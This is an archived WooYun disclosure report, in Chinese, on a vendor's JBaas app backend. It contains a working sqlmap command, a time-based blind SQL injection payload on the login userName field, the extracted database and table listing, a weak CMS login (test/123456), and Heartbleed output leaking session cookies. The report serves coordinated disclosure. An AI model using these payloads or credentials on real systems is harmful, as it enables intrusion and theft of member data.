乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-15: 细节已通知厂商并且等待厂商处理中 2016-05-18: 厂商已经确认,细节仅向厂商公开 2016-05-28: 细节向核心白帽子及相关领域专家公开 2016-06-07: 细节向普通白帽子公开 2016-06-17: 细节向实习白帽子公开 2016-07-02: 细节向公众公开
RT
看2位表哥都走大厂商了 我也试试呗http://**.**.**.**/bugs/wooyun-2010-0206169http://**.**.**.**/bugs/wooyun-2010-0204620下载了app然后在登陆处用户名出错就试了下存在注入
sqlmap语法:sqlmap.py -r 1.txt --dbs-------------------------post数据包-----userName参数-----------POST /JBaas/interfaceapp/checkLogin HTTP/1.1Content-Length: 70Content-Type: application/x-www-form-urlencodedHost: **.**.**.**:8080Connection: Keep-AliveAccept-Encoding: gzippassWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98%27-----------------------------payload---------- Payload: passWord=hddfjhddjfrh&userName=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98' AND (SELECT * FROM (SELECT(SLEEP(5)))FhhX)-- NInl
数据库信息back-end DBMS: MySQL 5.0.12available databases [5]:[*] information_schema[*] jbaas[*] mysql[*] performance_schema[*] radiusdb
当前库表信息 9w6会员信息 4614ap设备Database: jbaas+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| t_bus_app_device | 96821 || t_bus_member | 96053 || t_bus_ap | 4614 || t_bus_app_log | 630 || t_portal_log | 114 || t_sys_acl | 105 || t_sys_dictionary | 77 || t_sys_role_resource | 49 || t_bus_market | 37 || t_portal_template | 31 || t_sys_resource | 25 || t_bus_shop | 24 || t_bus_app_feedback | 21 || t_bus_area | 20 || t_bus_vector | 19 || t_bus_ac | 16 || t_sys_unit | 15 || t_portal_template_content_tree | 14 || t_portal_address | 12 || t_portal_template_content | 12 || t_portal_messageset | 11 || t_portal_messagetemplate | 10 || t_portal_template_tree | 10 || t_bus_market_indoormap | 8 || t_portal_strategy | 8 || t_motor_config | 7 || t_bus_promotion | 6 || t_bus_goods | 5 || t_portal_advertisement | 4 || t_portal_advertisement_and_list | 4 || t_portal_advertisement_list | 4 || t_bus_app | 3 || t_portal_notice | 3 || t_sys_actor | 3 || t_bus_syn | 2 || t_portal_phone | 2 || t_sys_role | 2 || t_bus_app_config | 1 |+---------------------------------+---------+
这里包括wifi密码啥玩意的
**.**.**.**/cms test 123456 进入
一处opensslpython openssl.py **.**.**.** | more---------------------------------------------------Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 16384 ... received message: type = 22, ver = 0302, length = 14397 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 48 54 4D 4C ....#.......HTML 00e0: 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 , like Gecko) Ch 00f0: 72 6F 6D 65 2F 33 38 2E 30 2E 32 31 32 35 2E 31 rome/38.0.2125.1 0100: 32 32 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 22 Safari/537.36 0110: 20 53 45 20 32 2E 58 20 4D 65 74 61 53 72 20 31 SE 2.X MetaSr 1 0120: 2E 30 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74 .0..Referer: htt 0130: 70 73 3A 2F 2F 34 32 2E 36 32 2E 31 31 2E 36 32 ps://**.**.**.** 0140: 2F 62 69 67 44 61 74 61 2F 6F 73 2F 6D 61 69 6E /bigData/os/main 0150: 2E 70 68 70 3F 63 3D 6C 6F 67 75 73 65 72 26 61 .php?c=loguser&a 0160: 3D 66 72 61 6D 65 26 73 69 74 65 69 64 3D 35 37 =frame&siteid=57 0170: 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E ..Accept-Encodin 0180: 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74 65 0D g: gzip,deflate. 0190: 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 .Accept-Language 01a0: 3A 20 7A 68 2D 43 4E 2C 7A 68 3B 71 3D 30 2E 38 : zh-CN,zh;q=0.8 01b0: 0D 0A 43 6F 6F 6B 69 65 3A 20 50 48 50 53 45 53 ..Cookie: PHPSES 01c0: 53 49 44 3D 61 66 62 37 38 62 61 33 33 37 39 37 SID=afb78ba33797 01d0: 36 63 61 34 34 64 39 31 36 30 32 62 35 31 37 66 6ca44d91602b517f 01e0: 33 35 35 30 0D 0A 0D 0A BA CF E8 6B 04 DC B3 2B 3550.......k...+ 01f0: 9B F6 A2 F5 DE 3C 7E 41 32 F4 21 EC 03 03 03 03 .....<~A2.!..... 0200: 3D 6C 6F 67 3B 20 50 48 50 53 45 53 53 49 44 3D =log; PHPSESSID= 0210: 61 66 62 37 38 62 61 33 33 37 39 37 36 63 61 34 afb78ba337976ca4 0220: 34 64 39 31 36 30 32 62 35 31 37 66 33 35 35 30 4d91602b517f3550 0230: 0D 0A 0D 0A 72 73 9F 9D E6 64 96 EE 8F 35 75 6C ....rs...d...5ul 0240: A3 06 A9 80 3B 2F 1C AC 07 07 07 07 07 07 07 07 ....;/.......... 0250: F0 C9 AA 0E 14 EC C0 42 F1 78 DF 98 36 98 51 AC .......B.x..6.Q. 0260: E4 17 58 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C ..X............. 0270: 33 39 61 32 65 61 30 30 61 66 30 35 0D 0A 0D 0A 39a2ea00af05.... 0280: 4E 3D 20 CF 76 95 0D 9D EB 6A C3 53 60 79 6F C8 N= .v....j.S`yo. 0290: 5E F1 CA BF 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B ^............... 02a0: CB DA 28 9A F5 11 9E E1 3D 99 85 12 DD C4 97 47 ..(.....=......G 02b0: 37 63 64 62 30 66 65 66 61 65 31 37 66 62 34 66 7cdb0fefae17fb4f 02c0: 38 34 36 65 62 63 62 30 34 65 37 34 35 39 0D 0A 846ebcb04e7459.. 02d0: 0D 0A FC 0F 13 20 24 95 5F 61 55 ED F1 80 DF 43 ..... $._aU....C 02e0: 1E 53 2B 62 07 E3 09 09 09 09 09 09 09 09 09 09 .S+b............ 02f0: 5A 2E 42 F4 6E 98 81 E6 BF C5 5C 86 7E 24 01 86 Z.B.n.....\.~$.. 0300: 44 13 AF D7 44 55 E8 AD 93 6D 34 9B 29 57 15 FB D...DU...m4.)W.. 0310: C8 DC F4 AC C4 6B 4E 9C 0C 77 4B 06 06 06 06 06 .....kN..wK..... 0320: 37 BE 16 93 E0 32 3E 7A 51 CC 79 F3 2D 02 02 02 7....2>zQ.y.-... 0330: 07 E1 95 6F 3B 40 F2 94 07 07 07 07 07 07 07 07 ...o;@.......... 0340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
过滤 加强密码
危害等级:高
漏洞Rank:10
确认时间:2016-05-18 14:28
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无
